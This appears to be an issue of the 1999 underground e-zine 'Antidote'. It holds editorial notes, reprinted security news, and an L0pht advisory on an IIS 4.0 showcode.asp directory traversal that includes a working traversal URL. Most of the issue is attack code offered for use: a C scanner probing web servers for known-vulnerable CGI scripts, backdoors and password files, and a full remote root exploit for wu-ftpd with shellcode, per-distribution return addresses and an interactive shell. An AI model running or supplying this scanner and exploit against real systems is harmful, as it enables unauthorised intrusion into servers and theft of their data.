Copy Link
Add to Bookmark
Report
Antidote Vol. 02 Issue 03
Volume 2 Issue 3
5/10/99
** **
***** * * ** *
* *** ** *** ** **
*** ** * ** **
* ** ******** ** **** ********
* ** *** **** ******** *** *** ** * *** * ******** ***
* ** **** **** * ** *** ********* * **** ** * ***
* ** ** **** ** ** ** **** ** ** ** * ***
* ** ** ** ** ** ** ** ** ** ** ** ***
********* ** ** ** ** ** ** ** ** ** ********
* ** ** ** ** ** ** ** ** ** ** *******
* ** ** ** ** ** ** ** ** ** ** **
***** ** ** ** ** ** ** ** ****** ** **** *
* **** ** * *** *** ** *** * ***** **** ** *******
* ** ** *** *** *** *** *****
*
** http://www.thepoison.org/antidote
------------------------------
Here is another issue of Antidote that has been released. Right now we have over
415 subscribers and getting more and more subscribers everyday. We are very sorry to
say that we are not going to be sending Antidote as a attchment anymore because we
have gotton so many subscribers that our mail server is going ape shit when we send
them (we don't have a mail server just for Antidote). What we are going to start to
do is just e-mail everyone the URL as to where they can download the new issue of
Antidote. So you will start recieving e-mails about ever week telling you that a new
issue of Antidote has been released and where you can get it. Sorry if this is an
inconvience to anyone, but it is such a hassle to send this as an attachment cause
of the mail server. The last issue that we sent as an attchment took us over 2 and a
half hours to send to all of the users because of problems and the mail server kept
crashing because of it.
At Antidote, we never ask anything from anyone except articles in wich is optional,
but now, if you could please visit our sponsor because we have to pay for the domain
(www.thepoison.org) and it is getting to be to expensive to keep it up, though we
don't want to take it down. So please take 2 seconds out of your time and please
visit:
http://www.websponsors.com/cgi-bin/ad_click.cgi?userid=8189&offerid=242
Keep in mind that we are asking 2 seconds of your time to go to our sponsor in wich
this e-zine took us over a week to write. Thats the least you can do. Take 2 seconds
and we take a week.
--=\\Contents\\=--
0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Shouts
0.04 - Writing
1.00 - News & Exploits
1.01 - Army Survival Training
1.02 - Free e-mail isn't Safe?
1.03 - CGIchk
1.04 - IIS 4.0
1.05 - wu-ftpd
1.06 - ippooper
2.00 - Misc
2.01 - Understanding a Computer Virus
2.02 - Dropping Phonelines
2.03 - Cold Fusion Scanner
------------------------------
--=\\0.00\\=--
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause
that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is
basically current news and happenings in the underground world. We aren't going to
teach you how to hack or anything, but we will supply you with the current
information and exploits. Mainly Antidote is just a magazine for people to read if
they have some extra time on there hands and are bored with nothing to do. If you
want to read a magazine that teaches you how to hack etc, then you might want to go
to your local bookstore and see if they carry '2600'.
------------------------------
0.02 --=\\FAQ\\=--
Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked
Questions". Please read this before e-mailing us with questions and if the question
isn't on here or doesn't make sense, then you can e-mail us with your question.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote to not be shot for the beginner or does not teach you the basics,
why is that?
Antidote is for everyone, all we are basically is a news ezine that comes out once
a week with the current news, exploits, flaws and even programming. All of the
articles that are in here are recieved second hand (sent to us) and we very rarely
edit anyone's articles.
> I just found Antidote issues on your webpage, is there anyway I can get them sent
to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you
can input your e-mail address. You will recieve Antidote the second we release it
and it will be sent as an attachments
> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would
like to be published above your article (when sending it to us) and we will do
what you say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they
sent it to us first. If you sent us something and we didn't e-mail you back, then
you might want to send it again because we probably didn't get it (we respond to
all e-mails no matter what). We might use your article in future issues of
Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote
it or not.
Well thats it for our FAQ. If you have a question that is not on here or the
question is on here and you had trouble understanding it, then please feel free to
e-mail lordoak@thepoison.org and he will answer your question. This FAQ will
probably be updated every month.
------------------------------
0.03 --=\\Shouts\\=--
These are just some shout outs that we feel we owe to some people. Some are
individuals and Some are groups in general. If you are not on this list and you feel
that For some reason you should be, then please contact Lord Oak and he will post
you on here and We are sorry for the Misunderstanding. Well, here are the shout outs
Duece ox1dation
Lord Oak Forlorn
Altomo 0dnek
PBBSER HNN [www.hackernews.com]
Thepoison.org Retribution
403-security.org EazyMoney
Like we said above, if we forgot you and/or you think you should be added, please e-
mail lordoak@thepoison.org and he will be sure to add you.
------------------------------
0.04 --=\\Writing\\=--
As many of you know, we are always open to articles/submittings. We will take almost
anything that has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and
saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that
is fine. If you have any questions about what is "acceptable" and not, please feel
free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will
answer it. Also, please note that if we recieve two e-mails with the same topic/idea
then we will use the one that we recieved first. So it might be a good idea to
e-mail one of us and ask us if someone has written about/on this topic so that way
you don't waste your time on writing something that won't be published. An example
of this would be:
If Joe sends me an e-mail with the topic being on hacking hotmail accounts on
thursday.
And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will
take Joe's article because he sent it in first.
But keep in mind, we might use your article for the next issue! If you have
something that you would like to submit to Antidote, please e-mail
lordoak@thepoison.org or duece@thepoison.org and one of us will review the article
and put it in Antidote (if we like it).
------------------------------
_________________________________
) ___ (
( //___/ / // ) ) // ) ) )
) /____ / // / / __ / / (
( / / // / / ) ) )
) / / ((___/ / ((___/ / (
( http://www.403-security.org )
) For the latest hacks and news (
(___________________________________)
--=\\1.00\\=--
1.01 --=\\Army Survival Training\\=--
[www.fcw.com]
BY DANIEL VERTON (dan_verton@fcw.com)
SALT LAKE CITY -- The Army this fall plans to offer an online graduate-level
training course on information systems survivability, teaching engineers to develop
systems capable of surviving any kind of technical glitch and network attack.
The new 14-week Infosurv course will be offered through the University of Maryland
as an online, distance-learning initiative sponsored by the Army Research Laboratory
in Adelphi, Md. During the course, students with a basic engineering background will
build on their education with instruction on reliability, security and performance
risks that must be addressed early in the life cycle of an information system.
According to Lt. Col. Paul Walczak, senior computer scientist at the Army Research
Laboratory, the concept of Infosurv has been around for about 10 years, growing out
of research conducted at the Army Research Laboratory. Survivability, Walczak said,
can best be defined as a system's ability to withstand hardware faults, software
flaws, network attacks by hackers and electromagnetic interference. When one of
these types of failures brings a system or a portion of a system down, the rest of
the information infrastructure must be capable of operating, he said.
"This is a serious attempt by the Army Research Lab to institutionalize the
concept," Walczak said. Until now, reliability, survivability and security have been
features that systems developers have "bolted on" after the development process
started, he said. The goal is to build these requirements into the system design
before development work begins, he said.
The Army plans to transmit live courses each Thursday from a lecture room on the
College Park, Md., campus to as many as 16 satellite locations. "We plan to beam
this course out to as many sites as are interested in it," said Walczak, who noted
that the University of Tennessee, Pennsylvania State University and Harvard
University also have expressed interest in taking part in future courses.
Peter Neumann, principal scientist at the Computer Science Laboratory at SRI
International and the principal investigator for Infosurv research, will be the
primary instructor for the course. The course will act as the core course in a new
four-course masters-level certificate program in survivable systems, and it also can
be used as credit toward a regular degree program.
http://www.fcw.com/pubs/fcw/1999/0503/web-army-5-5-99.html
------------------------------
1.02 --=\\Free E-mail isn't safe?\\=--
[comments by Lord Oak] As we all know, hotmail and yahoo's free e-mail service has
had a lot of vulnerabilities and security problems in the past. We know that the
vulnerabilities are old, but we thought that this article was a good one to explain
the "danger" your e-mail might be in if you use hotmail, yahoo or any other web-
based free e-mail.
[www.eurekalert.org]
Free Web-based e-mail services are vulnerable to hackers, according to an analysis
by the Internet Security Advisors Group, a consultancy in Severna Park, Maryland. In
its security probe, ISAG focused on the three biggest and most firmly established
Web-based free e-mail services: Microsoft's Hotmail, YahooMail and Excite Mail. It
found that all three failed to provide a basic security feature that helps keep
hackers out.
The major mistake made by all the service providers was to allow users an unlimited
number of attempts to log on, rather than locking them out after a couple of
attempts if they got the password wrong. This, says Ira Winkler, president of ISAG,
makes it possible for hackers to guess a password by brute force-using what is known
as an automated dictionary attack, which tries vast numbers of different passwords
until the correct one is found.
This, Winkler says, is a basic information security issue the service providers
should have got right. In addition, ISAG found that many Web-based e-mail systems
also fail to encrypt their passwords when they are sent over the Net, making them
easy prey for hackers to intercept. Some hackers collect passwords, logging into e-
mail accounts and sending bogus messages.
Last week, Hotmail tightened its security in response to ISAG's findings. Its log-in
protocol now incorporates a slight delay when the password is entered. For each
wrong attempt the delay increases, making any automated attack take an unfeasibly
long time. "There's no impact on members who log in successfully," says Laura
Norman, a project manager at Hotmail, "but this should deter potential dictionary
attacks." Yahoo has also made changes to its password security system and Excite is
believed to be considering the matter
http://www.eurekalert.org/releases/ns-fes050499.html
------------------------------
1.03 --=\\CGIchk\\=--
This is a CGI scanner that scans over 55 KNOWN cgi vulnerabilities.
/* ---------------------------------------------------------------------- */
/* CGI scanner v1.33, m0dify and recode by su1d sh3ll //UnlG 1999 */
/* Tested on Slackware linux with kernel 2.0.35;2.0.36; */
/* FreeBSD 2.2.2-3.1;IRIX 5.3 */
/* Source c0de by [CKS & Fdisk] */
/* Gr33tz to: Packet St0rm and Ken, ADM crew, ech0 security and CKS, ch4x,*/
/* el8.org users, #c0de, rain.forest.puppy/[WT], MnemoniX , */
/* hypoclear of lUSt */
/* Fuck to: www.hackzone.ru , HDT... CHC fuck u 2 llamaz-scr1pt k1dd1ez */
/* hey! v0rt-fu if u kewl programmer u must write u own proggi, */
/* and stop modify th1s scanner...(i can do it better and CKS ;) */
/* hmm, remember if u can add 2 CGi to scanner u can't change */
/* real Version number and name.....better go read 'C' Bible ;-) */
/* c0m1ng s00n: hmmm.... i forgot 8-) again forgot... :-) */
/* -----------------------------------------------[02:30 04.05.99 UnlG]- */
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
void main(int argc, char *argv[])
{
int sock,debugm=0;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "200";
char *cgistr;
char buffer[1024];
int count=0;
int numin;
char cgibuff[1024];
char *buff[100]; /* Don't u think 100 is enought? ;-)*/
char *cginame[100]; /* Don't u think 100 is enought? */
buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n";
/* v0rt-fu when u modify source, check this first line.... that's my 8-) */
buff[2] = "GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n";
buff[3] = "GET /cgi-bin/phf HTTP/1.0\n\n";
buff[4] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
buff[5] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
buff[6] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n";
buff[7] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
buff[8] = "GET /cgi-bin/handler HTTP/1.0\n\n";
buff[9] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
buff[10] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";
buff[11] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
buff[12] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n";
buff[13] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n";
buff[14] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
buff[15] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n";
buff[16] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n";
buff[17] = "GET /cgi-bin/www-sql HTTP/1.0\n\n";
buff[18] = "GET /cgi-bin/view-source HTTP/1.0\n\n";
buff[19] = "GET /cgi-bin/campas HTTP/1.0\n\n";
buff[20] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n";
buff[21] = "GET /cgi-bin/glimpse HTTP/1.0\n\n";
buff[22] = "GET /cgi-bin/man.sh HTTP/1.0\n\n";
buff[23] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n";
buff[24] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n";
buff[25] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n";
buff[26] = "GET /cgi-bin/jj HTTP/1.0\n\n";
buff[27] = "GET /cgi-bin/info2www HTTP/1.0\n\n";
buff[28] = "GET /cgi-bin/files.pl HTTP/1.0\n\n";
buff[29] = "GET /cgi-bin/finger HTTP/1.0\n\n";
buff[30] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n";
buff[31] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n";
buff[32] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n";
buff[33] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n";
buff[34] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n";
buff[35] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n";
buff[36] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n";
buff[37] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n";
buff[38] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n";
buff[39] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n";
buff[40] = "GET /_vti_pvt/shtml.dll HTTP/1.0\n\n";
buff[41] = "GET /_vti_pvt/shtml.exe HTTP/1.0\n\n";
buff[42] = "GET /cgi-dos/args.bat HTTP/1.0\n\n";
buff[43] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n";
buff[44] = "GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n";
buff[45] = "GET /scripts/CGImail.exe HTTP/1.0\n\n";
buff[46] = "GET /scripts/tools/newdsn.exe HTTP/1.0\n\n";
buff[47] = "GET /scripts/fpcount.exe HTTP/1.0\n\n";
buff[48] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n";
buff[49] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n";
buff[50] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n";
buff[51] = "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n";
buff[52] = "GET /search97.vts HTTP/1.0\n\n";
buff[53] = "GET /carbo.dll HTTP/1.0\n\n"; /* we have at archive about 70 CGi ,
rule? ;-) */
cginame[1] = "UnlG - backd00r ";
cginame[2] = "THC - backd00r ";
cginame[3] = "phf..classic :) ";
cginame[4] = "Count.cgi ";
cginame[5] = "test-cgi ";
cginame[6] = "nph-test-cgi ";
cginame[7] = "php.cgi ";
cginame[8] = "handler ";
cginame[9] = "webgais ";
cginame[10] = "websendmail ";
cginame[11] = "webdist.cgi ";
cginame[12] = "faxsurvey ";
cginame[13] = "htmlscript ";
cginame[14] = "pfdisplay ";
cginame[15] = "perl.exe ";
cginame[16] = "wwwboard.pl ";
cginame[17] = "www-sql ";
cginame[18] = "view-source ";
cginame[19] = "campas ";
cginame[20] = "aglimpse ";
cginame[21] = "glimpse ";
cginame[22] = "man.sh ";
cginame[23] = "AT-admin.cgi ";
cginame[24] = "filemail.pl ";
cginame[25] = "maillist.pl ";
cginame[26] = "jj ";
cginame[27] = "info2www ";
cginame[28] = "files.pl ";
cginame[29] = "finger ";
cginame[30] = "bnbform.cgi ";
cginame[31] = "survey.cgi ";
cginame[32] = "AnyForm2 ";
cginame[33] = "textcounter.pl ";
cginame[34] = "classifields.cgi";
cginame[35] = "environ.cgi ";
cginame[36] = "service.pwd ";
cginame[37] = "users.pwd ";
cginame[38] = "authors.pwd ";
cginame[39] = "administrators ";
cginame[40] = "shtml.dll ";
cginame[41] = "shtml.exe ";
cginame[42] = "args.bat ";
cginame[43] = "uploader.exe ";
cginame[44] = "bdir - samples ";
cginame[45] = "CGImail.exe ";
cginame[46] = "newdsn.exe ";
cginame[47] = "fpcount.exe ";
cginame[48] = "openfile.cfm ";
cginame[49] = "exprcalc.cfm ";
cginame[50] = "dispopenedfile ";
cginame[51] = "sendmail.cfm ";
cginame[52] = "search97.vts ";
cginame[53] = "carbo.dll ";
if (argc<2)
{
printf("\n [-- CGI Checker 1.33. Modified by su1d sh3ll //UnlG --]");
printf("\nusage : %s host ",argv[0]);
printf("\n Or : %s host -d for debug mode\n\n",argv[0]);
exit(0);
}
if (argc>2)
{
if(strstr("-d",argv[2]))
{
debugm=1;
}
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
printf("\n\n\t [CKS & Fdisk]'s CGI Checker - modify by su1d sh3ll 04.05.99\n\n\n");
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("\n\n\t [ Press any key to check out the httpd version...... ]\n");
getchar(); /* CKS sorry, but ur new piece of code don't work :-( */
send(sock, "HEAD / HTTP/1.0\n\n",17,0);
recv(sock, buffer, sizeof(buffer),0);
printf("%s",buffer);
close(sock);
printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n");
getchar();
while(count++ < 53) /* huh! 53 cgi..... no secur1ty in th1s w0rld ;-)*/
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("Searching for %s : ",cginame[count]);
for(numin=0;numin < 1024;numin++)
{
cgibuff[numin] = '\0';
}
send(sock, buff[count],strlen(buff[count]),0);
recv(sock, cgibuff, sizeof(cgibuff),0);
cgistr = strstr(cgibuff,foundmsg);
if( cgistr != NULL)
printf("Found !! ;)\n");
else
printf("Not Found\n");
if(debugm==1)
{
printf("\n\n ------------------------\n %s \n ------------------------\n",cgibuff);
printf("Press any key to continue....\n"); getchar();
}
close(sock);
}
printf("...have a nice hack... ;-)\n");
}
------------------------------
1.04 --=\\IIS 4.0\\=--
[www.l0pht.com]
-Description
Internet Information Server (IIS) 4.0 ships with a set of sample files to help web
developers learn about Active Server Pages (ASP). One of these sample files,
showcode.asp, is designed to view the source code of the sample applications via a
web browser. The showcode.asp file does inadequate security checking and allows
anyone with a web browser to view the contents of any text file on the web server.
This includes files that are outside of the document root of the webserver. Many
ecommerce web servers store transaction logs and other customer information such as
credit card numbers, shipping addresses, and purchase information in text files on
the web server. This is the type of data that could be accessed with this
vulnerability. The L0pht would like to thank Parcens for doing the initial research
on this problem.
-Details
The showcode.asp file is installed by default at the URL:
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp It takes 1 argument in
the URL, which is the file to view. The format of this argument is:
source=/path/filename So to view the contents of the showcode.asp file itself the
URL would be:
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp
This looks like a fairly dangerous sample file. It can view the contents to only
allow the viewing of the sample files which were in the '/msadc' directory on the
system. The problem is the security check does not test for the '..' characters
within the URL. The only checking done is if the URL contains the string '/msadc/'.
This allows URLs to be created that view, not only files outside of the samples
directory, but files anywhere on the entire file system that the web server's
document root is on. For example, a URL that will view the contents of the boot.ini
file, which is in the root directory of an NT system is:
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini
This URL requires that IIS 4.0 was installed in its default location.
-Solution
For production servers, sample files should never be installed so delete the entire
/msadc/samples directory. If you must have the showcode.asp capability on
development servers the showcode.asp file should be modified to test for URLs with
'..' in them and deny those requests. For specific questions about this advisory,
please contactweld@l0pht.com
http://www.l0pht.com/advisories.html
------------------------------
1.05 --=\\wu-ftpd\\=--
/*
* Remote/local exploit for wu-ftpd [12] through [18]
* gcc w00f.c -o w00f -Wall -O2
*
* Offsets/padding may need to be changed, depending on remote daemon
* compilation options. Try offsets -5000 to 5000 in increments of 100.
*
* Note: you need to use -t >0 for -any- version lower than 18.
* Coded by smiler and cossack
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
/* In a beta[12-17] shellcode_A overflow, we will not see responses
to our commands. Add option -c (use chroot code) to fix this. */
unsigned char hellcode_a[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01\x20"
"\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c"
"\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd"
"\x80\xe8\xcf\xff\xff\xff\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48";
unsigned char hellcode_b[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
"\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80"
"\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46"
"\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e"
"\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31"
"\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03"
"\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89"
"\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d"
"\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80"
"\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31"
"\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a";
char *Fgets(char *s,int size,FILE *stream);
int ftp_command(char *buf,int success,FILE *out,char *fmt,...);
int double_up(unsigned long blah,char *doh);
int resolv(char *hostname,struct in_addr *addr);
void fatal(char *string);
int usage(char *program);
int tcp_connect(struct in_addr host,unsigned short port);
int parse_pwd(char *in,int *pwdlen);
void RunShell(int thesock);
struct type {
unsigned long ret_address;
unsigned char align; /* Use this only to offset \xff's used */
signed short pad_shift; /* how little/much padding */
unsigned char overflow_type; /* whether you have to DELE */
char *name;
};
/* ret_pos is the same for all types of overflows, you only have to change
the padding. This makes it neater, and gives the shellcode plenty of
room for nops etc
*/
#define RET_POS 190
#define FTPROOT "/home/ftp"
/* the redhat 5.0 exploit doesn't work at the moment...it must be some
trite error i am overlooking. (the shellcode exits w/ code 0375) */
struct type types[]={
{ 0xbffff340, 3, 60, 0, "BETA-18 (redhat 5.2)", },
{ 0xbfffe30e, 3,-28, 1, "BETA-16 (redhat 5.1)", },
{ 0xb2ffe356, 3,-28, 1, "BETA-15 (redhat 5.0)", },
{ 0xbfffebc5, 3, 0, 1, "BETA-15 (slackware 3.3)", },
{ 0xbffff3b3, 3, 0, 1, "BETA-15 (slackware 3.4)", },
{ 0xbffff395, 3, 0, 1, "BETA-15 (slackware 3.6)", },
{ 0,0,0,0,NULL }
};
struct options {
char start_dir[20];
unsigned char *shellcode;
unsigned char chroot;
char username[10];
char password[10];
int offset;
int t;
} opts;
/* Bit of a big messy function, but hey, its only an exploit */
int main(int argc,char **argv)
{
char *argv0,ltr;
char outbuf[1024], inbuf[1024], ret_string[5];
int pwdlen,ctr,d;
FILE *cin;
int fd;
struct in_addr victim;
argv0 = strdup(argv[0]);
*opts.username = *opts.password = *opts.start_dir = 0;
opts.chroot = opts.offset = opts.t = 0;
opts.shellcode = hellcode_a;
while ((d = getopt(argc,argv,"cs:o:t:"))!= -1){
switch (d) {
case 'c':
opts.shellcode = hellcode_b;
opts.chroot = 1;
break;
case 's':
strcpy(opts.start_dir,optarg);
break;
case 'o':
opts.offset = atoi(optarg);
break;
case 't':
opts.t = atoi(optarg);
if ((opts.t < 0)||(opts.t>5)) {
printf("Dont have that type!\n");
exit(-1);
}
}
}
argc -= optind;
argv += optind;
if (argc < 3)
usage(argv0);
if (!resolv(argv[0],&victim)) {
perror("resolving");
exit(-1);
}
strcpy(opts.username,argv[1]);
strcpy(opts.password,argv[2]);
if ((fd = tcp_connect(victim,21)) < 0) {
perror("connect");
exit(-1);
}
if (!(cin = fdopen(fd,"r"))) {
printf("Couldn't get stream\n");
exit(-1);
}
Fgets(inbuf,sizeof(inbuf),cin);
printf("%s",inbuf);
if (ftp_command(inbuf,331,cin,"USER %s\n",opts.username)<0)
fatal("Bad username\n");
if (ftp_command(inbuf,230,cin,"PASS %s\n",opts.password)<0)
fatal("Bad password\n");
if (*opts.start_dir)
if (ftp_command(inbuf,250,cin,"CWD %s\n",opts.start_dir)<0)
fatal("Couldn't change dir\n");
if (ftp_command(inbuf,257,cin,"PWD\n")<0)
fatal("PWD\n");
if (parse_pwd(inbuf,&pwdlen) < 0)
fatal("PWD\n");
srand(time(NULL));
printf("Making padding directorys\n");
for (ctr = 0;ctr < 4;ctr++) {
ltr = rand()%26 + 65;
memset(outbuf,ltr,194);
outbuf[194]=0;
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
fatal("CWD\n");
}
/* Make padding directory */
ctr = 124 - (pwdlen - types[opts.t].align);//180
//ctr = 152 - (pwdlen - types[opts.t].align);
ctr -= types[opts.t].pad_shift;
if (ctr < 0) {
exit(-1);
}
memset(outbuf,'A',ctr+1);
outbuf[ctr] = 0;
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
fatal("CWD\n");
memset(outbuf,0x90,195);
d=0;
for (ctr = RET_POS-strlen(opts.shellcode);ctr<(RET_POS);ctr++)
outbuf[ctr] = opts.shellcode[d++];
double_up(types[opts.t].ret_address-opts.offset,ret_string);
strcpy(outbuf+RET_POS,ret_string);
strcpy(outbuf+RET_POS+strlen(ret_string),ret_string);
printf("Press any key to send shellcode...\n");
getchar();
if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
fatal("MKD\n");
if (types[opts.t].overflow_type == 1)
if (ftp_command(inbuf,250,cin,"DELE %s\n",outbuf)<0)
fatal("DELE\n");
/* HEH. For type 1 style we add a dele command. This overflow
occurs in delete() in ftpd.c. The cause is realpath() in realpath.c
not checking bounds correctly, overwriting path[] in delete(). */
RunShell(fd);
return(1);
}
void RunShell(int thesock)
{
int n;
char recvbuf[1024];
fd_set rset;
while (1)
{
FD_ZERO(&rset);
FD_SET(thesock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(thesock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(thesock,&rset))
{
n=read(thesock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(thesock,recvbuf,n);
}
}
}
return;
}
int double_up(unsigned long blah, char *doh)
{
int a;
unsigned char *ptr,*ptr2;
bzero(doh,6);
ptr=doh;
ptr2=(char *)&blah;
for (a=0;a<4;a++) {
*ptr++=*ptr2;
if (*ptr2==0xff) *ptr++=0xff;
ptr2++;
}
return(1);
}
int parse_pwd(char *in, int *pwdlen)
{
char *ptr1,*ptr2;
/* 257 "/" is current directory */
ptr1 = strchr(in,'\"');
if (!ptr1) return(-1);
ptr2 = strchr(ptr1+1,'\"');
if (!ptr2) return(-1);
*ptr2 = 0;
*pwdlen = strlen(ptr1+1);
/* If its just "/" then it contributes nothing to the RET_POS */
if (*pwdlen==1) *pwdlen -= 1;
printf("Home Dir = %s, Len = %d\n",ptr1+1,*pwdlen);
return(1);
}
int tcp_connect(struct in_addr host,unsigned short port)
{
struct sockaddr_in serv;
int fd;
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bzero(&serv,sizeof(serv));
memcpy(&serv.sin_addr,&host,sizeof(struct in_addr));
serv.sin_port = htons(port);
serv.sin_family = AF_INET;
if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) {
return(-1);
}
return(fd);
}
int ftp_command(char *buf,int success,FILE *out,char *fmt,...)
{
va_list va;
char line[1200];
int val;
va_start(va,fmt);
vsprintf(line,fmt,va);
va_end(va);
if (write(fileno(out),line,strlen(line)) < 0)
return(-1);
bzero(buf,200);
while(1) {
Fgets(line,sizeof(line),out);
#ifdef DEBUG
printf("%s",line);
#endif
if (*(line+3)!='-') break;
}
strncpy(buf,line,200);
val = atoi(line);
if (success != val) return(-1);
return(1);
}
void fatal(char *string)
{
printf("%s",string);
exit(-1);
}
char *Fgets(char *s,int size,FILE *stream)
{
char *ptr;
ptr = fgets(s,size,stream);
//if (!ptr)
//fatal("Disconnected\n");
return(ptr);
}
int resolv(char *hostname,struct in_addr *addr)
{
struct hostent *res;
if (inet_aton(hostname,addr))
return(1);
res = gethostbyname(hostname);
if (res == NULL)
return(0);
memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr));
return(1);
}
